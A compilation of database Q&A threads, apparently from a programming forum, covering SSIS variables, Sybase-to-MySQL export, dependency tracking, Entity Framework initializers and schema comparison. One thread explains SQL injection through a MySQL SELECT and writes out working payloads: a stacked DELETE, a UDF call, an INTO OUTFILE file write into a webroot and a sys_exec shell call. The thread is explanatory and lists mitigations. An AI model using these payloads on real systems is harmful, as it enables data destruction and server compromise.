I know it is best practice to use the stored procedure [SSISDB].[catalog].[set_environment_variable_value] to update existing environment variables.
However, can somebody explain why I can't just run UPDATEs on the [SSISDB].[internal].[environment_variables] table?
What's the risk here, and how is it any different from updating the old SSIS Configurations table when using the old package deployment method?
It's faster and easier to mass-update variables with a single UPDATE than to create a CURSOR to loop through them and run the sproc.
You can review the code of the set_environment_variable_value procedure and notice that it handles many scenarios, such as different data types, encrypting sensitive parameters, rollbacks, etc.
Another reason: the SSIS catalog structure and internal.environment_variables can look different in newer versions, so your single UPDATE statement may not work after an upgrade.
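For a handful of variables you don't even need a cursor; a plain call per variable is short enough. A minimal sketch, assuming made-up folder and environment names:
DECLARE @value sql_variant = N'NewServerName';
EXEC [SSISDB].[catalog].[set_environment_variable_value]
    @folder_name      = N'MyFolder',       -- hypothetical folder
    @environment_name = N'MyEnvironment',  -- hypothetical environment
    @variable_name    = N'ServerName',     -- the variable to change
    @value            = @value;            -- sql_variant, typed to match the variable
This way the datatype checks, encryption and transaction handling described above all still happen for you.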
I have two databases: Sybase and MySQL. I need to export records to MySQL when they are inserted in Sybase, or export them on some scheduled event.
I've tried the OUTPUT statement, but it cannot be used in triggers or procedures.
Any suggestions for solving this problem?
(Disclaimer: I've done similar things previously, but by no means would I consider the answer below the state of the art; it's just one possible approach. Google around for something like 'cross-database replication' or 'cross-RDBMS replication' to see who's done this before.)
I would first of all see if you can't get an ETL tool to do the job without too much work. There are free open-source ones, and even something like Microsoft SSIS might work with non-MS databases.
If not, I would split this into different steps.
1. Find an appropriate Sybase output command that exports a subset of rows from one or more tables. By subset I mean you need to be able to add a WHERE clause, not just do a full table dump.
2. Use an appropriate MySQL import script/command to load the data you got out of step #1. You may need to cycle back and forth between the two until you have something that works manually.
3. Write a Sybase trigger to insert lookup keys into a to-export table. You want to store at least the table name and the source Sybase row's keys for each inserted row. Use generic column names like key1_char and key2_char, not the actual column names; that makes it easier to extend to other source tables as needed. Keep trigger processing as light as possible. (What about updates, by the way?) There's a sketch of this part at the end of this answer.
4. Write a scheduled batch on the Sybase side to run step #1 for the rows flagged in step #3.
5. Write a scheduled batch on the MySQL side to import, via step #2, the results of step #4. Or kick it off from step #4.
Another approach is to do the flagging from step #3 as needed, but use it to drive one scheduled batch that SELECTs data from Sybase and INSERTs it into MySQL directly.
You'll have to pick up the data from Sybase's SELECT and bind it manually to the MySQL INSERT, but you probably get finer control over what's going on, and you don't have to juggle two batches. That's what I think a clever ETL tool would already be doing on your behalf. Any halfway clever scripting language like PHP, Python or Ruby ought to handle it easily. This is especially important if you have things like surrogate/auto-generated keys.
Keep in mind that in both cases you'll have to either delete the to-export rows that you've successfully inserted or flag them as done.
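Here is a rough sketch of the to-export table and trigger from step #3 plus the import from step #2. All table, column and file names are made up, and I'm assuming Sybase ASE-style trigger syntax; treat it as a starting point, not a finished implementation:
-- Sybase side: a lightweight queue of rows waiting to be exported
CREATE TABLE to_export (
    src_table varchar(30)  NOT NULL,            -- which source table the row came from
    key1_char varchar(50)  NOT NULL,            -- source key, stored as char to stay generic
    exported  char(1)      DEFAULT 'N' NOT NULL -- flipped to 'Y' once shipped
)

-- Fires on INSERT into the (hypothetical) orders table; records keys only, stays light
CREATE TRIGGER trg_orders_export ON orders FOR INSERT AS
    INSERT INTO to_export (src_table, key1_char)
    SELECT 'orders', convert(varchar(50), i.order_id)
    FROM inserted i

-- MySQL side: load whatever file the scheduled Sybase export (step #4) produced
LOAD DATA INFILE '/tmp/orders_delta.csv'
INTO TABLE orders
FIELDS TERMINATED BY ',' ENCLOSED BY '"';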
Red Gate has some pretty good tools, but I don't think that their Dependency Tracker shows how tables are affected by the stored procedures that touch them.
Is there any tool that can scan a database and determine which processes INSERT, UPDATE or DELETE records in a table, as opposed to just touching/being dependent on it? Seems like this should exist by now...
No, dependency tracking still isn't perfect. The reason is that procedures can reference tables via dynamic SQL, and dependencies can be broken if objects are dropped and re-created (I've written about how dependencies can break here). The best "first sweep" I have come to rely on is:
SELECT OBJECT_NAME([object_id])
FROM sys.sql_modules
WHERE LOWER(definition) LIKE '%table_name%';
Again, this won't find objects that build statements using dynamic SQL, and it can produce false positives because table_name could be simplistic and part of other object or parameter names, or included only in comments or commented-out code.
You can also check for plans that reference a table using sys.dm_exec_cached_plans and related DMVs/DMFs, but note that this won't find any plans that have rolled out of the cache.
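A minimal sketch of that plan-cache sweep, with the same false-positive caveats as above ('table_name' is again a placeholder):
SELECT t.[text]
FROM sys.dm_exec_cached_plans AS cp
CROSS APPLY sys.dm_exec_sql_text(cp.plan_handle) AS t -- recover the batch text behind each plan
WHERE t.[text] LIKE '%table_name%';                   -- same crude match as the sys.sql_modules query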
Using SQL Search, you can search for the column name and find all the stored procedures where it is used.
It's a third-party tool: Red Gate SQL Search.
Features:
Find fragments of SQL text within stored procedures, functions, views and more
Quickly navigate to objects wherever they happen to be on a server
Find all references to an object
Hope this will help you.
I would like to implement a custom database initialization strategy so that I can:
generate the database if it does not exist
if the model changes, create only the new tables
if the model changes, create only the new fields, without dropping the table and losing the data.
Thanks in advance
You need to implement the IDatabaseInitializer<TContext> interface.
E.g.:
public class MyInitializer : IDatabaseInitializer<MyDbContext>
{
public void InitializeDatabase(MyDbContext context)
{
//your logic here
}
}
And then set your initializer at your application startup:
Database.SetInitializer<MyDbContext>(new MyInitializer());
Here's an example
You will have to manually execute commands to alter the database.
// the DbContext's underlying ObjectContext is reached via IObjectContextAdapter
((IObjectContextAdapter)context).ObjectContext.ExecuteStoreCommand("ALTER TABLE dbo.MyTable ADD NewColumn VARCHAR(20) NULL");
You can use a tool like SQL Compare to script changes.
There is a reason why this doesn't exist yet. It is very complex, and moreover the IDatabaseInitializer interface is not really prepared for it (there is no way to make such initialization database-agnostic). Your question is "too broad" to be answered to your satisfaction. Judging by your reaction to @Eranga's correct answer, you expect that somebody will tell you step by step how to do that, but we will not; that would mean writing the initializer for you.
What do you need in order to do what you want?
You must have very good knowledge of SQL Server. You must know how SQL Server stores information about databases, tables, columns and relations: you must understand the sys views and know how to query them to get data about the current database structure (there's a small sketch of this after these points).
You must have very good knowledge of EF. You must know how EF stores mapping information and be able to explore its metadata to get information about the expected tables, columns and relations.
Once you have the old database description and the new database description, you must be able to write code that correctly works out the changes and creates the SQL DDL commands for changing your database. Even though this looks like the simplest part of the whole process, it is actually the hardest one, because there are many internal rules in SQL Server which your commands cannot violate. Sometimes you really need to drop a table to make your changes, and if you don't want to lose data you must first push it to a temporary table and push it back after recreating the table. Sometimes changes to constraints require temporarily turning constraints off, etc. There is a good reason why the tools which do this at the SQL level (comparing two databases) are probably all commercial.
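To give a flavour of the first point, here is a minimal sketch of reading the current structure from the sys catalog views. These are real views, but a real diff would need far more than this one query:
-- One row per column: table, column, type, length, nullability
SELECT t.name  AS table_name,
       c.name  AS column_name,
       ty.name AS type_name,
       c.max_length,
       c.is_nullable
FROM sys.tables  AS t
JOIN sys.columns AS c  ON c.object_id = t.object_id
JOIN sys.types   AS ty ON ty.user_type_id = c.user_type_id
ORDER BY t.name, c.column_id;
You would then have to capture the same kind of description from the EF metadata and compare the two.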
Even the ADO.NET team hasn't implemented this, and they will not implement it in the future. Instead, they are working on something called migrations.
Edit:
It is true that ObjectContext can return the script for database creation; that is exactly what the default initializers use. But how would it help you? Are you going to parse that script to see what changed? Are you going to execute that script on another connection and then use the same code as for the current database to inspect its structure?
Yes, you can create a new database, move the data from the old database to the new one, delete the old one and rename the new one, but that is the most stupid solution you can imagine, and no database administrator will ever allow it. Even this solution still requires an analysis of the changes to create correct data-transfer scripts.
Automatic upgrade is the wrong way. You should always prepare the upgrade script manually with the help of some tools, test it, and after that execute it manually or as part of some installation script/package. You must also back up your database before you make any changes.
The best way to achieve this is probably with migrations:
http://nuget.org/List/Packages/EntityFramework.SqlMigrations
Good blog posts here and here.
I've got one easy question: say there is a site with a query like:
SELECT id, name, message FROM messages WHERE id = $_GET['q']
Is there any way to get something updated/deleted in the database (MySQL)? Until now I've never seen an injection that was able to delete/update via a SELECT query, so is it even possible?
Before directly answering the question, it's worth noting that even if all an attacker can do is read data that he shouldn't be able to, that's usually still really bad. Consider that by using JOINs and SELECTing from system tables (like mysql.innodb_table_stats), an attacker who starts with a SELECT injection and no other knowledge of your database can map your schema and then exfiltrate the entirety of the data that you have in MySQL. For the vast majority of databases and applications, that already represents a catastrophic security hole.
But to answer the question directly: there are a few ways that I know of by which injection into a MySQL SELECT can be used to modify data. Fortunately, they all require reasonably unusual circumstances to be possible. All example injections below are given relative to the example injectable query from the question:
SELECT id, name, message FROM messages WHERE id = $_GET['q']
1. "Stacked" or "batched" queries.
The classic injection technique of just putting an entire other statement after the one being injected into. As suggested in another answer here, you could set $_GET['q'] to 1; DELETE FROM users; -- so that the query forms two statements which get executed consecutively, the second of which deletes everything in the users table.
In mitigation
Most MySQL connectors - notably including PHP's (deprecated) mysql_* and (non-deprecated) mysqli_* functions - don't support stacked or batched queries at all, so this kind of attack just plain doesn't work. However, some do - notably including PHP's PDO connector (although the support can be disabled to increase security).
2. Exploiting user-defined functions
Functions can be called from a SELECT, and can alter data. If a data-altering function has been created in the database, you could make the SELECT call it, for instance by passing 0 OR SOME_FUNCTION_NAME() as the value of $_GET['q'].
In mitigation
Most databases don't contain any user-defined functions - let alone data-altering ones - and so offer no opportunity at all to perform this sort of exploit.
3. Writing to files
As described in Muhaimin Dzulfakar's (somewhat presumptuously named) paper Advanced MySQL Exploitation, you can use INTO OUTFILE or INTO DUMPFILE clauses on a MySQL select to dump the result into a file. Since, by using a UNION, any arbitrary result can be SELECTed, this allows writing new files with arbitrary content at any location that the user running mysqld can access. Conceivably this can be exploited not merely to modify data in the MySQL database, but to get shell access to the server on which it is running - for instance, by writing a PHP script to the webroot and then making a request to it, if the MySQL server is co-hosted with a PHP server.
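As a sketch, the injected value of q could look something like the following; the file path is made up, the three selected values are there to match the column count of the original query, and the file contents could just as well be a script:
1 UNION SELECT 'arbitrary file contents', 2, 3
  INTO OUTFILE '/var/www/html/proof.txt'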
In mitigation
Lots of factors reduce the practical exploitability of this otherwise impressive-sounding attack:
MySQL will never let you use INTO OUTFILE or INTO DUMPFILE to overwrite an existing file, nor write to a folder that doesn't exist. This prevents attacks like creating a .ssh folder with a private key in the mysql user's home directory and then SSHing in, or overwriting the mysqld binary itself with a malicious version and waiting for a server restart.
Any halfway decent installation package will set up a special user (typically named mysql) to run mysqld, and give that user only very limited permissions. As such, it shouldn't be able to write to most locations on the file system - and certainly shouldn't ordinarily be able to do things like write to a web application's webroot.
Modern installations of MySQL come with --secure-file-priv set by default, preventing MySQL from writing to anywhere other than a designated data import/export directory and thereby rendering this attack almost completely impotent... unless the owner of the server has deliberately disabled it. Fortunately, nobody would ever just completely disable a security feature like that since that would obviously be - oh wait never mind.
4. Calling the sys_exec() function from lib_mysqludf_sys to run arbitrary shell commands
There's a MySQL extension called lib_mysqludf_sys that - judging from its stars on GitHub and a quick Stack Overflow search - has at least a few hundred users. It adds a function called sys_exec that runs shell commands. As noted in #2, functions can be called from within a SELECT; the implications are hopefully obvious. To quote from the source, this function "can be a security hazard".
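Following the same pattern as in #2, the injected value of q could then be something like this (the command itself is purely illustrative):
0 OR sys_exec('id > /tmp/proof')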
In mitigation
Most systems don't have this extension installed.
If you say you use mysql_query, which doesn't support multiple queries, you cannot directly add DELETE/UPDATE/INSERT statements, but it's still possible to modify data under some circumstances. For example, let's say you have the following function:
DELIMITER //
CREATE DEFINER=`root`@`localhost` FUNCTION `testP`()
RETURNS int(11)
LANGUAGE SQL
NOT DETERMINISTIC
MODIFIES SQL DATA
SQL SECURITY DEFINER
COMMENT ''
BEGIN
DELETE FROM test2;
return 1;
END //
Now you can call this function in a SELECT:
SELECT id, name, message FROM messages WHERE id = NULL OR testP()
(id = NULL always evaluates to NULL, which is not true, so testP() always gets executed and its DELETE runs.)
It depends on the DBMS connector you are using. Most of the time your scenario will not be possible, but under certain circumstances it could work. For further details, take a look at chapters 4 and 5 of the Black Hat paper Advanced MySQL Exploitation.
Yes, it's possible.
$_GET['q'] would hold 1; DELETE FROM users; --
SELECT id, name, message FROM messages WHERE id = 1; DELETE FROM users; -- whatever here');
The trailing -- turns whatever is left of the original query (here the closing ');) into a comment.
I have two databases on a SQL Server: one for development (call it "TestData"), and one for production (call it "LiveData"). I make changes to TestData, typically adding tables or adding new fields to existing tables (rarely dropping anything) and creating or modifying stored procedures. At some point, I would like to update the LiveData tables, stored procedures, etc. with the changes made to TestData. I only want this to affect the schema, not the actual data. What is the best way to do this? I am new to SQL Server, so the more detailed the explanation, the better.
edit: I know there are third-party programs out there, but I'm looking into ways to do this without separate software, just using scripts, etc.
You might want to take a look at Red Gate SQL Compare.
DBComparer is a great free utility to compare schemas. It is a little buggy and crashes sometimes, but other than that it works great.
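If you'd rather stay script-only, as your edit suggests, one crude starting point is to diff the catalog views of the two databases directly. This sketch uses the database names from the question and only finds columns missing from LiveData; type changes, procedures, constraints, etc. would all need their own comparisons:
-- Columns that exist in TestData but not in LiveData
SELECT s.name AS schema_name, t.name AS table_name, c.name AS column_name
FROM TestData.sys.columns AS c
JOIN TestData.sys.tables  AS t ON t.object_id = c.object_id
JOIN TestData.sys.schemas AS s ON s.schema_id = t.schema_id
EXCEPT
SELECT s.name, t.name, c.name
FROM LiveData.sys.columns AS c
JOIN LiveData.sys.tables  AS t ON t.object_id = c.object_id
JOIN LiveData.sys.schemas AS s ON s.schema_id = t.schema_id;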